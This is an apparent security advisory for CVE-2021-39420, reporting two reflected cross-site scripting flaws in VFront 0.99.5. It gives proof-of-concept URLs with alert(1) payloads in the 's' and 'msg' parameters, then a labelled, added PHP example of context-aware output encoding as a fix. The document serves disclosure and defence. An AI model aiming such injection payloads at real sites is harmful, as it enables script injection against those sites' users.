Cross-site scripting in VFront v0.99.5

Multiple cross-site scripting vulnerabilities are present in VFront 0.99.5. Details of each vulnerability follow:

file: search_all.php
line: 104
exploit: http://localhost/vfront-0.99.51/search_all.php?s=%22alert(1);

file: add.attach.php
line: 351
exploit: http://localhost/vfront-0.99.51/add.attach.php?feed=ko&id=1&t=tabella&msg=alert(1);
Note: the parameter 't' must be the name of an existing table in the database managed by VFront.

The above vulnerabilities are published as CVE-2021-39420.

This vulnerability was detected as part of the DARPA CHESS program.
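
Context-aware output encoding for the two reflected parameters listed above, as an added example that is not part of the original report and is not VFront's code. The report does not show the code at the cited lines, so the sink contexts (HTML attribute, HTML text, inline JavaScript) are assumptions, as are the helper names `html_escape`, `js_escape` and `query_string`; PHP 7.3 or later is assumed.

```php
<?php
// Added example, not VFront code. The sink contexts are assumptions: the
// report does not show search_all.php line 104 or add.attach.php line 351.

/** Encode a value for HTML text or a quoted HTML attribute. */
function html_escape(string $value): string
{
    // ENT_QUOTES encodes both " and ', so the value cannot close an attribute.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Encode a value as a JavaScript string literal for an inline <script>. */
function js_escape(string $value): string
{
    // JSON_HEX_* emit <, >, &, ' and " as \uXXXX escapes, so the value can
    // neither end the string literal nor close the enclosing <script> element.
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_INVALID_UTF8_SUBSTITUTE | JSON_THROW_ON_ERROR;
    return json_encode($value, $flags);
}

/** Read a query parameter as a string; array input (?s[]=x) becomes ''. */
function query_string(array $query, string $name): string
{
    $value = $query[$name] ?? '';
    return is_string($value) ? $value : '';
}

// Constructed input: the decoded values of 's' and 'msg' from the report.
$query = ['s' => '"alert(1);', 'msg' => 'alert(1);'];

$s   = query_string($query, 's');
$msg = query_string($query, 'msg');

// HTML attribute context: the double quote is emitted as &quot;
echo '<input type="text" name="s" value="' . html_escape($s) . '">' . "\n";

// HTML text context.
echo '<p class="msg">' . html_escape($msg) . '</p>' . "\n";

// JavaScript context: the value stays data inside a quoted string literal.
echo '<script>var msg = ' . js_escape($msg) . ';</script>' . "\n";
```

In the real application `$query` would be `$_GET`; the encoder has to match the context the value is written into, so `html_escape` alone is not sufficient for a value placed inside a script block.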